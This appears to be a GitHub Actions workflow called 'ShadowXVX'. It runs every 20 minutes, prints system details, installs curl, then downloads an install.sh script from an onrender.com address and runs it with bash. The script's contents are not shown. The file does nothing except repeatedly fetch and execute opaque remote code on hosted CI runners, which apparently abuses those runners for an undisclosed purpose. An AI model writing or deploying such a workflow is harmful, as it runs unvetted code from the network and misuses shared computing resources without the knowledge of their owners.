name: ShadowXVX

on:
  workflow_dispatch:
  schedule:
    - cron: "*/20 * * * *"

jobs:
  ShadowXV:
    runs-on: ubuntu-latest

    steps:
      - name: Test Ubuntu
        run: |
          echo "Workflow started!"
          date
          uname -a

      - name: Install curl
        run: |
          sudo apt update
          sudo apt install -y curl

      - name: Run ShadowXV
        run: |
          curl -fsSL https://shadowinstallxv8.onrender.com/install.sh -o install.sh
          bash install.sh
